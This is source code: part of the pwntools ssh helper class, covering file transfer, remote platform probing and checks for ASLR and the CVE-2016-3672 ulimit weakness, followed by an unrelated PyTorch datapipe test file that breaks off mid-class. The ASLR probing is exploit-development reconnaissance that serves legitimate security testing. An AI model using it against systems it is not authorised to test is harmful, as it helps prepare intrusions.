def upload_dir(self, local, remote=None):
"""Recursively uploads a directory onto the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
local = os.path.expanduser(local)
dirname = os.path.dirname(local)
basename = os.path.basename(local)
if not os.path.isdir(local):
self.error("%r is not a directory" % local)
msg = "Uploading %r to %r" % (basename,remote)
with self.waitfor(msg):
# Generate a tarfile with everything inside of it
local_tar = tempfile.mktemp()
with tarfile.open(local_tar, 'w:gz') as tar:
tar.add(local, basename)
# Upload and extract it
with context.local(log_level='error'):
remote_tar = self.mktemp('--suffix=.tar.gz')
self.upload_file(local_tar, remote_tar)
untar = self.run('cd %s && tar -xzf %s' % (remote, remote_tar))
message = untar.recvrepeat(2)
if untar.wait() != 0:
self.error("Could not untar %r on the remote end\n%s" % (remote_tar, message))
def upload(self, file_or_directory, remote=None):
"""upload(file_or_directory, remote=None)
Upload a file or directory to the remote host.
Arguments:
            file_or_directory(str): Path to the file or directory to upload.
            remote(str): Remote path to store the data.
By default, uses the working directory.
"""
if isinstance(file_or_directory, str):
file_or_directory = os.path.expanduser(file_or_directory)
file_or_directory = os.path.expandvars(file_or_directory)
if os.path.isfile(file_or_directory):
return self.upload_file(file_or_directory, remote)
if os.path.isdir(file_or_directory):
return self.upload_dir(file_or_directory, remote)
self.error('%r does not exist' % file_or_directory)
def download(self, file_or_directory, local=None):
"""download(file_or_directory, local=None)
Download a file or directory from the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to download.
local(str): Local path to store the data.
By default, uses the current directory.
"""
if not self.sftp:
self.error("Cannot determine remote file type without SFTP")
with self.system('test -d ' + sh_string(file_or_directory)) as io:
is_dir = io.wait()
if 0 == is_dir:
self.download_dir(file_or_directory, local)
else:
self.download_file(file_or_directory, local)
put = upload
get = download
def unlink(self, file):
"""unlink(file)
Delete the file on the remote host
Arguments:
file(str): Path to the file
"""
if not self.sftp:
self.error("unlink() is only supported if SFTP is supported")
return self.sftp.unlink(file)
def libs(self, remote, directory = None):
"""Downloads the libraries referred to by a file.
This is done by running ldd on the remote server, parsing the output
and downloading the relevant files.
        The directory argument specifies where to download the files. This defaults
to './$HOSTNAME' where $HOSTNAME is the hostname of the remote server."""
libs = self._libs_remote(remote)
remote = context._decode(self.readlink('-f',remote).strip())
libs[remote] = 0
if directory is None:
directory = self.host
directory = os.path.realpath(directory)
res = {}
seen = set()
for lib, addr in libs.items():
local = os.path.realpath(os.path.join(directory, '.' + os.path.sep + lib))
if not local.startswith(directory):
self.warning('This seems fishy: %r' % lib)
continue
misc.mkdir_p(os.path.dirname(local))
if lib not in seen:
self.download_file(lib, local)
seen.add(lib)
res[local] = addr
return res
def interactive(self, shell=None):
"""Create an interactive session.
This is a simple wrapper for creating a new
:class:`pwnlib.tubes.ssh.ssh_channel` object and calling
:meth:`pwnlib.tubes.ssh.ssh_channel.interactive` on it."""
s = self.shell(shell)
if self.cwd != '.':
cmd = 'cd ' + sh_string(self.cwd)
s.sendline(cmd)
s.interactive()
s.close()
def set_working_directory(self, wd = None, symlink = False):
"""Sets the working directory in which future commands will
be run (via ssh.run) and to which files will be uploaded/downloaded
from if no path is provided
Note:
            This uses ``mktemp -d`` under the covers and sets permissions
on the directory to ``0700``. This means that setuid binaries
will **not** be able to access files created in this directory.
In order to work around this, we also ``chmod +x`` the directory.
Arguments:
wd(string): Working directory. Default is to auto-generate a directory
based on the result of running 'mktemp -d' on the remote machine.
symlink(bool,str): Create symlinks in the new directory.
The default value, ``False``, implies that no symlinks should be
created.
A string value is treated as a path that should be symlinked.
It is passed directly to the shell on the remote end for expansion,
so wildcards work.
Any other value is treated as a boolean, where ``True`` indicates
that all files in the "old" working directory should be symlinked.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> cwd = s.set_working_directory()
>>> s.ls()
b''
>>> s.pwd() == cwd
True
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> homedir = s.pwd()
>>> _=s.touch('foo')
>>> _=s.set_working_directory()
>>> assert s.ls() == b''
>>> _=s.set_working_directory(homedir)
>>> assert b'foo' in s.ls().split()
>>> _=s.set_working_directory(symlink=True)
>>> assert b'foo' in s.ls().split()
>>> assert homedir != s.pwd()
>>> symlink=os.path.join(homedir,b'*')
>>> _=s.set_working_directory(symlink=symlink)
>>> assert b'foo' in s.ls().split()
>>> assert homedir != s.pwd()
"""
status = 0
if symlink and not isinstance(symlink, (six.binary_type, six.text_type)):
symlink = os.path.join(self.pwd(), b'*')
if not hasattr(symlink, 'encode') and hasattr(symlink, 'decode'):
symlink = symlink.decode('utf-8')
if not wd:
wd, status = self.run_to_end('x=$(mktemp -d) && cd $x && chmod +x . && echo $PWD', wd='.')
wd = wd.strip()
if status:
self.error("Could not generate a temporary directory (%i)\n%s" % (status, wd))
else:
cmd = b'ls ' + sh_string(wd)
_, status = self.run_to_end(cmd, wd = '.')
if status:
self.error("%r does not appear to exist" % wd)
self.cwd = wd
if not isinstance(wd, str):
self.cwd = wd.decode('utf-8')
self.info("Working directory: %r" % self.cwd)
if symlink:
self.ln('-s', symlink, '.')
return wd
def write(self, path, data):
"""Wrapper around upload_data to match :func:`pwnlib.util.misc.write`"""
return self.upload_data(data, path)
def read(self, path):
"""Wrapper around download_data to match :func:`pwnlib.util.misc.read`"""
return self.download_data(path)
def _init_remote_platform_info(self):
r"""Fills _platform_info, e.g.:
::
{'distro': 'Ubuntu\n',
'distro_ver': '14.04\n',
'machine': 'x86_64',
'node': 'pwnable.kr',
'processor': 'x86_64',
'release': '3.11.0-12-generic',
'system': 'linux',
'version': '#19-ubuntu smp wed oct 9 16:20:46 utc 2013'}
"""
if self._platform_info:
return
def preexec():
import platform
print('\n'.join(platform.uname()))
with context.quiet:
with self.process('true', preexec_fn=preexec) as io:
self._platform_info = {
'system': io.recvline().lower().strip().decode(),
'node': io.recvline().lower().strip().decode(),
'release': io.recvline().lower().strip().decode(),
'version': io.recvline().lower().strip().decode(),
'machine': io.recvline().lower().strip().decode(),
'processor': io.recvline().lower().strip().decode(),
'distro': 'Unknown',
'distro_ver': ''
}
try:
if not self.which('lsb_release'):
return
with self.process(['lsb_release', '-irs']) as io:
self._platform_info.update({
'distro': io.recvline().strip().decode(),
'distro_ver': io.recvline().strip().decode()
})
except Exception:
pass
@property
def os(self):
""":class:`str`: Operating System of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(os=self._platform_info['system']):
return context.os
except Exception:
return "Unknown"
@property
def arch(self):
""":class:`str`: CPU Architecture of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(arch=self._platform_info['machine']):
return context.arch
except Exception:
return "Unknown"
@property
def bits(self):
""":class:`str`: Pointer size of the remote machine."""
try:
with context.local():
context.clear()
context.arch = self.arch
return context.bits
except Exception:
return context.bits
@property
def version(self):
""":class:`tuple`: Kernel version of the remote machine."""
try:
self._init_remote_platform_info()
vers = self._platform_info['release']
# 3.11.0-12-generic
expr = r'([0-9]+\.?)+'
vers = re.search(expr, vers).group()
return tuple(map(int, vers.split('.')))
except Exception:
return (0,0,0)
@property
def distro(self):
""":class:`tuple`: Linux distribution name and release."""
try:
self._init_remote_platform_info()
return (self._platform_info['distro'], self._platform_info['distro_ver'])
except Exception:
return ("Unknown", "Unknown")
@property
def aslr(self):
""":class:`bool`: Whether ASLR is enabled on the system.
Example:
>>> s = ssh("travis", "example.pwnme")
>>> s.aslr
True
"""
if self._aslr is None:
if self.os != 'linux':
self.warn_once("Only Linux is supported for ASLR checks.")
self._aslr = False
else:
with context.quiet:
rvs = self.read('/proc/sys/kernel/randomize_va_space')
self._aslr = not rvs.startswith(b'0')
return self._aslr
@property
def aslr_ulimit(self):
""":class:`bool`: Whether the entropy of 32-bit processes can be reduced with ulimit."""
import pwnlib.elf.elf
import pwnlib.shellcraft
if self._aslr_ulimit is not None:
return self._aslr_ulimit
# This test must run a 32-bit binary, fix the architecture
arch = {
'amd64': 'i386',
'aarch64': 'arm'
}.get(self.arch, self.arch)
with context.local(arch=arch, bits=32, os=self.os, aslr=True):
with context.quiet:
try:
sc = pwnlib.shellcraft.cat('/proc/self/maps') \
+ pwnlib.shellcraft.exit(0)
elf = pwnlib.elf.elf.ELF.from_assembly(sc, shared=True)
except Exception:
self.warn_once("Can't determine ulimit ASLR status")
self._aslr_ulimit = False
return self._aslr_ulimit
def preexec():
import resource
try:
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
except Exception:
pass
# Move to a new temporary directory
cwd = self.cwd
tmp = self.set_working_directory()
try:
self.upload(elf.path, './aslr-test')
except IOError:
self.warn_once("Couldn't check ASLR ulimit trick")
self._aslr_ulimit = False
return False
self.process(['chmod', '+x', './aslr-test']).wait()
maps = self.process(['./aslr-test'], preexec_fn=preexec).recvall()
# Move back to the old directory
self.cwd = cwd
# Clean up the files
self.process(['rm', '-rf', tmp]).wait()
# Check for 55555000 (1/3 of the address space for PAE)
# and for 40000000 (1/3 of the address space with the 3GB barrier)
self._aslr_ulimit = bool(b'55555000' in maps or b'40000000' in maps)
return self._aslr_ulimit
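# Illustrative sketch (not part of the original source): aslr_ulimit can be checked
# up front to decide whether 32-bit ASLR entropy can be reduced by unlimiting the
# stack (CVE-2016-3672). Host credentials below are placeholders:
#
#   >>> s = ssh('travis', 'example.pwnme')
#   >>> if s.aslr and s.aslr_ulimit:
#   ...     print("RLIMIT_STACK trick applies; 32-bit mappings lose most ASLR entropy")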
def _checksec_cache(self, value=None):
path = self._get_cachefile('%s-%s' % (self.host, self.port))
if value is not None:
with open(path, 'w+') as f:
f.write(value)
elif os.path.exists(path):
with open(path, 'r+') as f:
return f.read()
def checksec(self, banner=True):
"""checksec()
Prints a helpful message about the remote system.
Arguments:
banner(bool): Whether to print the path to the ELF binary.
"""
cached = self._checksec_cache()
if cached:
return cached
red = text.red
green = text.green
yellow = text.yellow
res = [
"%s@%s:" % (self.user, self.host),
"Distro".ljust(10) + ' '.join(self.distro),
"OS:".ljust(10) + self.os,
"Arch:".ljust(10) + self.arch,
"Version:".ljust(10) + '.'.join(map(str, self.version)),
"ASLR:".ljust(10) + {
True: green("Enabled"),
False: red("Disabled")
}[self.aslr]
]
if self.aslr_ulimit:
res += [ "Note:".ljust(10) + red("Susceptible to ASLR ulimit trick (CVE-2016-3672)")]
cached = '\n'.join(res)
self._checksec_cache(cached)
return cached
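# Illustrative sketch (not part of the original source) showing how the platform
# introspection properties above fit together; the expected values are what the
# properties would typically return for an x86_64 Linux host and are assumptions,
# not guaranteed output:
#
#   >>> s = ssh('travis', 'example.pwnme')
#   >>> s.os, s.arch, s.bits      # backed by _init_remote_platform_info()
#   ('linux', 'amd64', 64)
#   >>> isinstance(s.version, tuple)   # kernel version parsed into a tuple of ints
#   True
#   >>> print(s.checksec())       # cached per host:port by _checksec_cache()
#   travis@example.pwnme:...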
|
test_datapipe.py
|
import http.server
import itertools
import os
import os.path
import pickle
import random
import socketserver
import sys
import tarfile
import tempfile
import threading
import time
import unittest
import warnings
import zipfile
from functools import partial
from typing import (
Any,
Awaitable,
Dict,
Generic,
Iterator,
List,
NamedTuple,
Optional,
Set,
Tuple,
Type,
TypeVar,
Union,
)
from unittest import skipIf
import numpy as np
import torch
import torch.utils.data.backward_compatibility
import torch.utils.data.datapipes as dp
import torch.utils.data.graph
import torch.utils.data.sharding
from torch.testing._internal.common_utils import TestCase, run_tests, suppress_warnings
from torch.utils.data import (
DataLoader,
DataChunk,
IterDataPipe,
MapDataPipe,
RandomSampler,
argument_validation,
runtime_validation,
runtime_validation_disabled,
)
from torch.utils.data.datapipes.utils.decoder import (
basichandlers as decoder_basichandlers,
)
try:
import dill
# XXX: By default, dill writes the Pickler dispatch table to inject its
# own logic there. This globally affects the behavior of the standard library
# pickler for any user who transitively depends on this module!
# Undo this extension to avoid altering the behavior of the pickler globally.
dill.extend(use_dill=False)
HAS_DILL = True
except ImportError:
HAS_DILL = False
skipIfNoDill = skipIf(not HAS_DILL, "no dill")
try:
import pandas # type: ignore[import] # noqa: F401 F403
HAS_PANDAS = True
except ImportError:
HAS_PANDAS = False
skipIfNoDataFrames = skipIf(not HAS_PANDAS, "no dataframes (pandas)")
T_co = TypeVar("T_co", covariant=True)
def create_temp_dir_and_files():
# The temp dir and files within it will be released and deleted in tearDown().
# Adding `noqa: P201` to avoid the lint warning about not releasing the dir handle within this function.
temp_dir = tempfile.TemporaryDirectory() # noqa: P201
temp_dir_path = temp_dir.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.txt') as f:
temp_file1_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.byte') as f:
temp_file2_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.empty') as f:
temp_file3_name = f.name
with open(temp_file1_name, 'w') as f1:
f1.write('0123456789abcdef')
with open(temp_file2_name, 'wb') as f2:
f2.write(b"0123456789abcdef")
temp_sub_dir = tempfile.TemporaryDirectory(dir=temp_dir_path) # noqa: P201
temp_sub_dir_path = temp_sub_dir.name
with tempfile.NamedTemporaryFile(dir=temp_sub_dir_path, delete=False, suffix='.txt') as f:
temp_sub_file1_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_sub_dir_path, delete=False, suffix='.byte') as f:
temp_sub_file2_name = f.name
with open(temp_sub_file1_name, 'w') as f1:
f1.write('0123456789abcdef')
with open(temp_sub_file2_name, 'wb') as f2:
f2.write(b"0123456789abcdef")
return [(temp_dir, temp_file1_name, temp_file2_name, temp_file3_name),
(temp_sub_dir, temp_sub_file1_name, temp_sub_file2_name)]
# Given a DataPipe and integer n, iterate the DataPipe for n elements and store the elements into a list
# Then, reset the DataPipe and return a tuple of two lists
# 1. A list of elements yielded before the reset
# 2. A list of all elements of the DataPipe after the reset
def reset_after_n_next_calls(datapipe: IterDataPipe[T_co], n: int) -> Tuple[List[T_co], List[T_co]]:
it = iter(datapipe)
res_before_reset = []
for _ in range(n):
res_before_reset.append(next(it))
return res_before_reset, list(datapipe)
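# Illustrative sketch (not part of the original file) of what the helper above returns
# for a small IterDataPipe; IDP is the length-aware wrapper defined further below:
#
#   >>> before, after = reset_after_n_next_calls(IDP([10, 20, 30]), 2)
#   >>> before          # elements consumed before the reset
#   [10, 20]
#   >>> after           # the full DataPipe, iterated again from the start
#   [10, 20, 30]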
class TestDataChunk(TestCase):
def setUp(self):
self.elements = list(range(10))
random.shuffle(self.elements)
self.chunk: DataChunk[int] = DataChunk(self.elements)
def test_getitem(self):
for i in range(10):
self.assertEqual(self.elements[i], self.chunk[i])
def test_iter(self):
for ele, dc in zip(self.elements, iter(self.chunk)):
self.assertEqual(ele, dc)
def test_len(self):
self.assertEqual(len(self.elements), len(self.chunk))
def test_as_string(self):
self.assertEqual(str(self.chunk), str(self.elements))
batch = [self.elements] * 3
chunks: List[DataChunk[int]] = [DataChunk(self.elements)] * 3
self.assertEqual(str(batch), str(chunks))
def test_sort(self):
chunk: DataChunk[int] = DataChunk(self.elements)
chunk.sort()
self.assertTrue(isinstance(chunk, DataChunk))
for i, d in enumerate(chunk):
self.assertEqual(i, d)
def test_reverse(self):
chunk: DataChunk[int] = DataChunk(self.elements)
chunk.reverse()
self.assertTrue(isinstance(chunk, DataChunk))
for i in range(10):
self.assertEqual(chunk[i], self.elements[9 - i])
def test_random_shuffle(self):
elements = list(range(10))
chunk: DataChunk[int] = DataChunk(elements)
rng = random.Random(0)
rng.shuffle(chunk)
rng = random.Random(0)
rng.shuffle(elements)
self.assertEqual(chunk, elements)
class TestIterableDataPipeBasic(TestCase):
def setUp(self):
ret = create_temp_dir_and_files()
self.temp_dir = ret[0][0]
self.temp_files = ret[0][1:]
self.temp_sub_dir = ret[1][0]
self.temp_sub_files = ret[1][1:]
def tearDown(self):
try:
self.temp_sub_dir.cleanup()
self.temp_dir.cleanup()
except Exception as e:
warnings.warn("TestIterableDatasetBasic was not able to cleanup temp dir due to {}".format(str(e)))
def test_listdirfiles_iterable_datapipe(self):
temp_dir = self.temp_dir.name
datapipe = dp.iter.FileLister(temp_dir, '')
count = 0
for pathname in datapipe:
count = count + 1
self.assertTrue(pathname in self.temp_files)
self.assertEqual(count, len(self.temp_files))
count = 0
datapipe = dp.iter.FileLister(temp_dir, '', recursive=True)
for pathname in datapipe:
count = count + 1
self.assertTrue((pathname in self.temp_files) or (pathname in self.temp_sub_files))
self.assertEqual(count, len(self.temp_files) + len(self.temp_sub_files))
def test_loadfilesfromdisk_iterable_datapipe(self):
# test import datapipe class directly
from torch.utils.data.datapipes.iter import (
FileLister,
FileLoader,
)
temp_dir = self.temp_dir.name
datapipe1 = FileLister(temp_dir, '')
datapipe2 = FileLoader(datapipe1)
count = 0
for rec in datapipe2:
count = count + 1
self.assertTrue(rec[0] in self.temp_files)
with open(rec[0], 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
self.assertEqual(count, len(self.temp_files))
# TODO(VitalyFedyunin): Generates unclosed buffer warning, need to investigate
def test_readfilesfromtar_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_tarfile_pathname = os.path.join(temp_dir, "test_tar.tar")
with tarfile.open(temp_tarfile_pathname, "w:gz") as tar:
tar.add(self.temp_files[0])
tar.add(self.temp_files[1])
tar.add(self.temp_files[2])
datapipe1 = dp.iter.FileLister(temp_dir, '*.tar')
datapipe2 = dp.iter.FileLoader(datapipe1)
datapipe3 = dp.iter.TarArchiveReader(datapipe2)
# read extracted files before reaching the end of the tarfile
for rec, temp_file in itertools.zip_longest(datapipe3, self.temp_files):
self.assertTrue(rec is not None and temp_file is not None)
self.assertEqual(os.path.basename(rec[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
# read extracted files after reaching the end of the tarfile
data_refs = list(datapipe3)
self.assertEqual(len(data_refs), len(self.temp_files))
for data_ref, temp_file in zip(data_refs, self.temp_files):
self.assertEqual(os.path.basename(data_ref[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(data_ref[1].read(), f.read())
data_ref[1].close()
def test_readfilesfromzip_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_zipfile_pathname = os.path.join(temp_dir, "test_zip.zip")
with zipfile.ZipFile(temp_zipfile_pathname, 'w') as myzip:
myzip.write(self.temp_files[0])
myzip.write(self.temp_files[1])
myzip.write(self.temp_files[2])
datapipe1 = dp.iter.FileLister(temp_dir, '*.zip')
datapipe2 = dp.iter.ZipArchiveReader(datapipe1)
# Test Case: read extracted files before reaching the end of the zipfile
for rec, temp_file in itertools.zip_longest(datapipe2, self.temp_files):
self.assertTrue(rec is not None and temp_file is not None)
self.assertEqual(os.path.basename(rec[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
# Test Case: read extracted files after reaching the end of the zipfile
data_refs = list(datapipe2)
self.assertEqual(len(data_refs), len(self.temp_files))
for data_ref, temp_file in zip(data_refs, self.temp_files):
self.assertEqual(os.path.basename(data_ref[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(data_ref[1].read(), f.read())
data_ref[1].close()
# Test Case: reset the DataPipe after reading part of it
n_elements_before_reset = 1
res_before_reset, res_after_reset = reset_after_n_next_calls(datapipe2, n_elements_before_reset)
# Check the results accumulated before reset
self.assertEqual(len(res_before_reset), n_elements_before_reset)
for ele_before_reset, temp_file in zip(res_before_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_before_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_before_reset[1].read(), f.read())
ele_before_reset[1].close()
# Check the results accumulated after reset
self.assertEqual(len(res_after_reset), len(self.temp_files))
for ele_after_reset, temp_file in zip(res_after_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_after_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_after_reset[1].read(), f.read())
ele_after_reset[1].close()
def test_routeddecoder_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_pngfile_pathname = os.path.join(temp_dir, "test_png.png")
png_data = np.array([[[1., 0., 0.], [1., 0., 0.]], [[1., 0., 0.], [1., 0., 0.]]], dtype=np.single)
np.save(temp_pngfile_pathname, png_data)
datapipe1 = dp.iter.FileLister(temp_dir, ['*.png', '*.txt'])
datapipe2 = dp.iter.FileLoader(datapipe1)
def _png_decoder(extension, data):
if extension != 'png':
return None
return np.load(data)
def _helper(prior_dp, dp, channel_first=False):
# Byte stream is not closed
for inp in prior_dp:
self.assertFalse(inp[1].closed)
for inp, rec in zip(prior_dp, dp):
ext = os.path.splitext(rec[0])[1]
if ext == '.png':
expected = np.array([[[1., 0., 0.], [1., 0., 0.]], [[1., 0., 0.], [1., 0., 0.]]], dtype=np.single)
if channel_first:
expected = expected.transpose(2, 0, 1)
self.assertEqual(rec[1], expected)
else:
with open(rec[0], 'rb') as f:
self.assertEqual(rec[1], f.read().decode('utf-8'))
# Corresponding byte stream is closed by Decoder
self.assertTrue(inp[1].closed)
cached = list(datapipe2)
datapipe3 = dp.iter.RoutedDecoder(cached, _png_decoder)
datapipe3.add_handler(decoder_basichandlers)
_helper(cached, datapipe3)
cached = list(datapipe2)
datapipe4 = dp.iter.RoutedDecoder(cached, decoder_basichandlers)
datapipe4.add_handler(_png_decoder)
_helper(cached, datapipe4, channel_first=True)
# TODO(VitalyFedyunin): Generates unclosed buffer warning, need to investigate
def test_groupby_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_tarfile_pathname = os.path.join(temp_dir, "test_tar.tar")
file_list = [
"a.png", "b.png", "c.json", "a.json", "c.png", "b.json", "d.png",
"d.json", "e.png", "f.json", "g.png", "f.png", "g.json", "e.json",
"h.txt", "h.json"]
with tarfile.open(temp_tarfile_pathname, "w:gz") as tar:
for file_name in file_list:
file_pathname = os.path.join(temp_dir, file_name)
with open(file_pathname, 'w') as f:
f.write('12345abcde')
tar.add(file_pathname)
datapipe1 = dp.iter.FileLister(temp_dir, '*.tar')
datapipe2 = dp.iter.FileLoader(datapipe1)
datapipe3 = dp.iter.TarArchiveReader(datapipe2)
def group_fn(data):
filepath, _ = data
return os.path.basename(filepath).split(".")[0]
datapipe4 = dp.iter.Grouper(datapipe3, group_key_fn=group_fn, group_size=2)
def order_fn(data):
data.sort(key=lambda f: f[0], reverse=True)
return data
datapipe5 = dp.iter.Mapper(datapipe4, fn=order_fn) # type: ignore[var-annotated]
expected_result = [
("a.png", "a.json"), ("c.png", "c.json"), ("b.png", "b.json"), ("d.png", "d.json"),
("f.png", "f.json"), ("g.png", "g.json"), ("e.png", "e.json"), ("h.txt", "h.json")]
count = 0
for rec, expected in zip(datapipe5, expected_result):
count = count + 1
self.assertEqual(os.path.basename(rec[0][0]), expected[0])
self.assertEqual(os.path.basename(rec[1][0]), expected[1])
for i in [0, 1]:
self.assertEqual(rec[i][1].read(), b'12345abcde')
rec[i][1].close()
self.assertEqual(count, 8)
def test_demux_mux_datapipe(self):
numbers = NumbersDataset(10)
n1, n2 = numbers.demux(2, lambda x: x % 2)
self.assertEqual([0, 2, 4, 6, 8], list(n1))
self.assertEqual([1, 3, 5, 7, 9], list(n2))
numbers = NumbersDataset(10)
n1, n2, n3 = numbers.demux(3, lambda x: x % 3)
n = n1.mux(n2, n3)
self.assertEqual(list(range(10)), list(n))
# Test Case: Uneven DataPipes
source_numbers = list(range(0, 10)) + [10, 12]
numbers_dp = IDP(source_numbers)
n1, n2 = numbers_dp.demux(2, lambda x: x % 2)
self.assertEqual([0, 2, 4, 6, 8, 10, 12], list(n1))
self.assertEqual([1, 3, 5, 7, 9], list(n2))
n = n1.mux(n2)
self.assertEqual(source_numbers, list(n))
class TestDataFramesPipes(TestCase):
"""
Most of test will fail if pandas instaled, but no dill available.
Need to rework them to avoid multiple skips.
"""
def _get_datapipe(self, range=10, dataframe_size=7):
return NumbersDataset(range) \
.map(lambda i: (i, i % 3))
def _get_dataframes_pipe(self, range=10, dataframe_size=7):
return NumbersDataset(range) \
.map(lambda i: (i, i % 3)) \
._to_dataframes_pipe(
columns=['i', 'j'],
dataframe_size=dataframe_size)
@skipIfNoDataFrames
@skipIfNoDill # TODO(VitalyFedyunin): Decouple tests from dill by avoiding lambdas in map
def test_capture(self):
dp_numbers = self._get_datapipe().map(lambda x: (x[0], x[1], x[1] + 3 * x[0]))
df_numbers = self._get_dataframes_pipe()
df_numbers['k'] = df_numbers['j'] + df_numbers.i * 3
self.assertEqual(list(dp_numbers), list(df_numbers))
@skipIfNoDataFrames
@skipIfNoDill
def test_shuffle(self):
# With non-zero (but extremely low) probability (when the shuffle happens to leave the order unchanged),
# this test fails, so feel free to restart it
df_numbers = self._get_dataframes_pipe(range=1000).shuffle()
dp_numbers = self._get_datapipe(range=1000)
df_result = [tuple(item) for item in df_numbers]
self.assertNotEqual(list(dp_numbers), df_result)
self.assertEqual(list(dp_numbers), sorted(df_result))
@skipIfNoDataFrames
@skipIfNoDill
def test_batch(self):
df_numbers = self._get_dataframes_pipe(range=100).batch(8)
df_numbers_list = list(df_numbers)
last_batch = df_numbers_list[-1]
self.assertEqual(4, len(last_batch))
unpacked_batch = [tuple(row) for row in last_batch]
self.assertEqual([(96, 0), (97, 1), (98, 2), (99, 0)], unpacked_batch)
@skipIfNoDataFrames
@skipIfNoDill
def test_unbatch(self):
df_numbers = self._get_dataframes_pipe(range=100).batch(8).batch(3)
dp_numbers = self._get_datapipe(range=100)
self.assertEqual(list(dp_numbers), list(df_numbers.unbatch(2)))
@skipIfNoDataFrames
@skipIfNoDill
def test_filter(self):
df_numbers = self._get_dataframes_pipe(range=10).filter(lambda x: x.i > 5)
self.assertEqual([(6, 0), (7, 1), (8, 2), (9, 0)], list(df_numbers))
class FileLoggerSimpleHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, logfile=None, **kwargs):
self.__loggerHandle = None
if logfile is not None:
self.__loggerHandle = open(logfile, 'a+')
super().__init__(*args, **kwargs)
def log_message(self, format, *args):
if self.__loggerHandle is not None:
self.__loggerHandle.write("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format % args))
return
def finish(self):
if self.__loggerHandle is not None:
self.__loggerHandle.close()
super().finish()
def setUpLocalServerInThread():
try:
Handler = partial(FileLoggerSimpleHTTPRequestHandler, logfile=None)
socketserver.TCPServer.allow_reuse_address = True
server = socketserver.TCPServer(("", 0), Handler)
server_addr = "{host}:{port}".format(host=server.server_address[0], port=server.server_address[1])
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
# Wait a bit for the server to come up
time.sleep(3)
return (server_thread, server_addr, server)
except Exception:
raise
def create_temp_files_for_serving(tmp_dir, file_count, file_size,
file_url_template):
furl_local_file = os.path.join(tmp_dir, "urls_list")
with open(furl_local_file, 'w') as fsum:
for i in range(0, file_count):
f = os.path.join(tmp_dir, "webfile_test_{num}.data".format(num=i))
write_chunk = 1024 * 1024 * 16
rmn_size = file_size
while rmn_size > 0:
with open(f, 'ab+') as fout:
fout.write(os.urandom(min(rmn_size, write_chunk)))
rmn_size = rmn_size - min(rmn_size, write_chunk)
fsum.write(file_url_template.format(num=i))
class TestIterableDataPipeHttp(TestCase):
__server_thread: threading.Thread
__server_addr: str
__server: socketserver.TCPServer
@classmethod
def setUpClass(cls):
try:
(cls.__server_thread, cls.__server_addr,
cls.__server) = setUpLocalServerInThread()
except Exception as e:
warnings.warn("TestIterableDataPipeHttp could\
not set up due to {0}".format(str(e)))
@classmethod
def tearDownClass(cls):
try:
cls.__server.shutdown()
cls.__server_thread.join(timeout=15)
except Exception as e:
warnings.warn("TestIterableDataPipeHttp could\
not tear down (clean up temp directory or terminate\
local server) due to {0}".format(str(e)))
def _http_test_base(self, test_file_size, test_file_count, timeout=None,
chunk=None):
def _get_data_from_tuple_fn(data, *args, **kwargs):
return data[args[0]]
with tempfile.TemporaryDirectory(dir=os.getcwd()) as tmpdir:
# create tmp dir and files for test
base_tmp_dir = os.path.basename(os.path.normpath(tmpdir))
file_url_template = ("http://{server_addr}/{tmp_dir}/"
"/webfile_test_{num}.data\n")\
.format(server_addr=self.__server_addr, tmp_dir=base_tmp_dir,
num='{num}')
create_temp_files_for_serving(tmpdir, test_file_count,
test_file_size, file_url_template)
datapipe_dir_f = dp.iter.FileLister(tmpdir, '*_list')
datapipe_stream = dp.iter.FileLoader(datapipe_dir_f)
datapipe_f_lines = dp.iter.LineReader(datapipe_stream)
datapipe_line_url: IterDataPipe[str] = \
dp.iter.Mapper(datapipe_f_lines, _get_data_from_tuple_fn, (1,))
datapipe_http = dp.iter.HttpReader(datapipe_line_url,
timeout=timeout)
datapipe_tob = dp.iter.StreamReader(datapipe_http, chunk=chunk)
for (url, data) in datapipe_tob:
self.assertGreater(len(url), 0)
self.assertRegex(url, r'^http://.+\d+.data$')
if chunk is not None:
self.assertEqual(len(data), chunk)
else:
self.assertEqual(len(data), test_file_size)
@unittest.skip("Stress test on large amount of files skipped\
due to the CI timing constraint.")
def test_stress_http_reader_iterable_datapipes(self):
test_file_size = 10
# STATS: It takes about 5 hours to stress test 16 * 1024 * 1024
# files locally
test_file_count = 1024
self._http_test_base(test_file_size, test_file_count)
@unittest.skip("Test on the very large file skipped\
due to the CI timing constraint.")
def test_large_files_http_reader_iterable_datapipes(self):
# STATS: It takes about 11 mins to test a large file of 64GB locally
test_file_size = 1024 * 1024 * 128
test_file_count = 1
timeout = 30
chunk = 1024 * 1024 * 8
self._http_test_base(test_file_size, test_file_count, timeout=timeout,
chunk=chunk)
class IDP_NoLen(IterDataPipe):
def __init__(self, input_dp):
super().__init__()
self.input_dp = input_dp
def __iter__(self):
